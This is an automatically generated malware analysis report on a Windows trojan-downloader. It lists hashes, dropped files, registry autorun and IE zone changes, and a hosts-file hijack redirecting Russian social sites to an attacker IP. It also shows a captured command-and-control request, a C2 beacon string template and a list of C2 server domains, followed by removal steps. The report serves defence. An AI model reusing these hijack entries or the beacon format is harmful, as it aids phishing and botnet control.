Trojan.GenericKD.2414417_543aead455
Trojan.Win32.Bicololo.bfle (Kaspersky), Trojan.GenericKD.2414417 (AdAware), Trojan-Downloader.Win32.Moure.FD (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 543aead45568ecb83dc504741f14d01b
SHA1: 17658a9ee986f8bf03fb34076bf7a75c7081e148
SHA256: f87c6be872453863acf8893bbac65f43052713b5fa9eb1935ed3090e8d147c35
SSDeep: 6144:yZXBsWqsE/Ao mv8Qv0LVmwq4FU0nN876sazL7mq2TygpItSzyc1Tdu:0XmwRo mv8QD4 0N46lr2TJp4s0
Size: 318962 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:464
krip.exe:1996
WScript.exe:1460
WScript.exe:456
The Trojan injects its code into the following process(es):
krip.exe:1952
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Napnut\Nezavisimo\dartaniyan.vbs (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (246 bytes)
%Program Files%\Napnut\Nezavisimo\6.txt (27 bytes)
%Program Files%\Napnut\Nezavisimo\Uninstall.ini (2 bytes)
%Program Files%\Napnut\Nezavisimo\krip.exe (2603 bytes)
%Program Files%\Napnut\Nezavisimo\5.txt (16 bytes)
%Program Files%\Napnut\Nezavisimo\onkilogok.bat (1 bytes)
%Program Files%\Napnut\Nezavisimo\kislogon.vbs (884 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Program Files%\Napnut\Nezavisimo\Uninstall.exe (5138 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
The process krip.exe:1996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\puyHax68BCtfOFS-yEkFho7CGXmqAtv-TiyrYmW7LepB9D5-ijSc01dxnfQMmeq.exe (304 bytes)
%Documents and Settings%\%current user%\Application Data\02 - Silversun Pickups - Well Thought Out Twinkles.mp3 (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\quaestor.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2.tmp (2940 bytes)
%Documents and Settings%\%current user%\Application Data\puutia18uaau781uiao (321 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\quaestor.dll (0 bytes)
The process WScript.exe:1460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].htm (0 bytes)
Registry activity
The process %original file name%.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"EstimatedSize" = "193"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"VersionMajor" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"Language" = "1033"
"DisplayIcon" = "%Program Files%\Napnut\Nezavisimo\Uninstall.exe"
"VersionMinor" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Napnut\Nezavisimo]
"krip.exe" = "krip"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"InstallLocation" = "%Program Files%\Napnut\Nezavisimo\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"UninstallString" = "%Program Files%\Napnut\Nezavisimo\Uninstall.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"InstallDate" = "20150614"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Napnut\Nezavisimo]
"onkilogok.bat" = "onkilogok"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"NoRepair" = "1"
"DisplayName" = "Nezavisimo 1.5"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 E9 D1 7E 53 DF 11 C7 6B 2B 99 F4 DD C5 D0 ED"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"DisplayVersion" = "1.5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nezavisimo 1.5]
"NoModify" = "1"
"Publisher" = "Napnut"
"InstallSource" = "c:\"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Nezavisimo" = "%Program Files%\Napnut\Nezavisimo\krip.exe"
The process krip.exe:1952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 18 FE 11 95 2C 03 43 B1 70 D7 FA 41 E3 B9 A5"
[HKCU\Software\NVIDIA Corporation\Global\nvUpdate]
"Value" = "20150407"
"Guid" = "b99f990f-ec08-4113-93d8-c037b8600001"
The process krip.exe:1996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 6E 5F AF 41 47 01 0A 7F 7E BD 53 A2 5E E0 3F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process WScript.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 A9 E3 F3 1E 5F 03 7A 43 A1 48 DF 7E 9B AD 7E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process WScript.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 83 BF BA 85 EB 3F 44 65 18 A9 B7 3B B0 70 9C"
Dropped PE files
| MD5 | File path |
|---|---|
| 5b9b32ae30d744aefd0a770d87480409 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\puyHax68BCtfOFS-yEkFho7CGXmqAtv-TiyrYmW7LepB9D5-ijSc01dxnfQMmeq.exe |
| 78048f9d344186611d0472908c103f41 | c:\Program Files\Napnut\Nezavisimo\Uninstall.exe |
| 3b6f856264222c873c26873586c7e600 | c:\Program Files\Napnut\Nezavisimo\krip.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1191 bytes in size. The following strings are added to the hosts file listed below:
| 104.238.215.112 | my.mail.ru |
| 104.238.215.112 | m.my.mail.ru |
| 104.238.215.112 | vk.com |
| 104.238.215.112 | ok.ru |
| 104.238.215.112 | m.vk.com |
| 104.238.215.112 | odnoklassniki.ru |
| 104.238.215.112 | vk.com |
| 104.238.215.112 | www.odnoklassniki.ru |
| 104.238.215.112 | m.odnoklassniki.ru |
| 104.238.215.112 | ok.ru |
| 104.238.215.112 | m.ok.ru |
| 104.238.215.112 | www.odnoklassniki.ru |
| 104.238.215.112 | sotialmonstercookie.ru |
| 217.20.152.226 | st.mycdn.me |
| 217.20.156.72 | mycdn.me |
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: Napnut
Product Name:
Product Version:
Legal Copyright: Napnut
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.5
File Description: Nezavisimo 1.5 Installation
Comments:
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 148684 | 148992 | 4.57087 | bac8bae7a5e5326cf49943b90d1c062a |
| DATA | 155648 | 10388 | 10752 | 2.62963 | abafcbfbd7f8ac0226ca496a92a0cf06 |
| BSS | 167936 | 4341 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 176128 | 6040 | 6144 | 3.38637 | 7a4934595db0efc364c3982c4e335d8c |
| .tls | 184320 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 188416 | 24 | 512 | 0.14174 | c4fdd0c5c9efb616fcc85d66056ca490 |
| .reloc | 192512 | 6276 | 6656 | 4.56552 | 867a1120317d51734587a74f6ee70016 |
| .rsrc | 200704 | 17716 | 17920 | 4.23845 | 9fa2e6f0ed3cea6ab82dc6750ac0322a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 6
b4963c389287f4c6f458afaa28b334a4
cd8c5ce2011db01ed767504290b26287
80f967af249a9209c671d54a5d954b2e
6f5922cd04b5355696a75992bd51fe67
f4a232485e4a65ff6f7daba701e8b39a
fe9ff0b3dde78d617ccbaa02d85ed4c0
URLs
| URL | IP |
|---|---|
| hxxp://chuteiracansadabsb.com.br/feng/tmp/test.php?id=86&mwa=ce005a |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /feng/tmp/test.php?id=86&mwa=ce005a HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: chuteiracansadabsb.com.br
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 14 Jun 2015 17:23:04 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html....................HTTP/1.1 200 OK..Date: Sun, 14 Jun 2015 17:23:04 G
MT..Server: Apache..Vary: Accept-Encoding..Content-Encoding: gzip..Con
tent-Length: 20..Keep-Alive: timeout=5, max=500..Connection: Keep-Aliv
e..Content-Type: text/html........................
The Trojan connects to the servers at the folowing location(s):
.text
P`.data
.rdata
[email protected]_fram
[email protected]
.idata
bpass
qb99f990f-ec08-4113-93d8-c037b8600001
libgcj-13.dll
@%s:%s:%d
-_.!~*'()
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0
badpass
%s:%s
20150407
server-%s.ruhomevideo.com:30,server-%s.sndcmdex.com:30,server-%s.sendrepp.com:30,server-%s.updmaker.com:30,server-%s.muzboxxx.cn:30,server-%s.mymovieboxxx.com:30,server-%s.statgglr.com:30,server-%s.prostiforum.com:30,server-%s.muzzzboxx.com:30,server-%s.microrepo.com:30,server-%s.gglerr.com:30
8kernel32.dll
advapi32.dll
rpcrt4.dll
shlwapi.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
ws2_32.dll
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
GCC: (tdm-2) 4.8.1
KERNEL32.dll
msvcrt.dll
krip.exe_1952_rwx_00400000_00012000:
.text
P`.data
.rdata
[email protected]_fram
[email protected]
.idata
bpass
qb99f990f-ec08-4113-93d8-c037b8600001
libgcj-13.dll
@%s:%s:%d
-_.!~*'()
GET /stat?uptime=%d&downlink=%d&uplink=%d&id=%s&statpass=%s&version=%d&features=%d&guid=%s&comment=%s&p=%d&s=%s HTTP/1.0
badpass
%s:%s
20150407
server-%s.ruhomevideo.com:30,server-%s.sndcmdex.com:30,server-%s.sendrepp.com:30,server-%s.updmaker.com:30,server-%s.muzboxxx.cn:30,server-%s.mymovieboxxx.com:30,server-%s.statgglr.com:30,server-%s.prostiforum.com:30,server-%s.muzzzboxx.com:30,server-%s.microrepo.com:30,server-%s.gglerr.com:30
8kernel32.dll
advapi32.dll
rpcrt4.dll
shlwapi.dll
RegCreateKeyA
RegCloseKey
RegOpenKeyA
ws2_32.dll
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
GCC: (tdm-2) 4.8.1
KERNEL32.dll
msvcrt.dll
wuauclt.exe_636:
.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
zcÁ
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:464
krip.exe:1996
WScript.exe:1460
WScript.exe:456 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\Napnut\Nezavisimo\dartaniyan.vbs (298 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (246 bytes)
%Program Files%\Napnut\Nezavisimo\6.txt (27 bytes)
%Program Files%\Napnut\Nezavisimo\Uninstall.ini (2 bytes)
%Program Files%\Napnut\Nezavisimo\krip.exe (2603 bytes)
%Program Files%\Napnut\Nezavisimo\5.txt (16 bytes)
%Program Files%\Napnut\Nezavisimo\onkilogok.bat (1 bytes)
%Program Files%\Napnut\Nezavisimo\kislogon.vbs (884 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Program Files%\Napnut\Nezavisimo\Uninstall.exe (5138 bytes)
%Documents and Settings%\%current user%\Application Data\puyHax68BCtfOFS-yEkFho7CGXmqAtv-TiyrYmW7LepB9D5-ijSc01dxnfQMmeq.exe (304 bytes)
%Documents and Settings%\%current user%\Application Data\02 - Silversun Pickups - Well Thought Out Twinkles.mp3 (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\quaestor.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl2.tmp (2940 bytes)
%Documents and Settings%\%current user%\Application Data\puutia18uaau781uiao (321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].htm (0 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Nezavisimo" = "%Program Files%\Napnut\Nezavisimo\krip.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.